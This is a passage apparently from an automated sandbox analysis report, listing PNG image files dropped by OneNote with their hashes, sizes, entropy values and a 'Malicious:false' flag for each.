                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
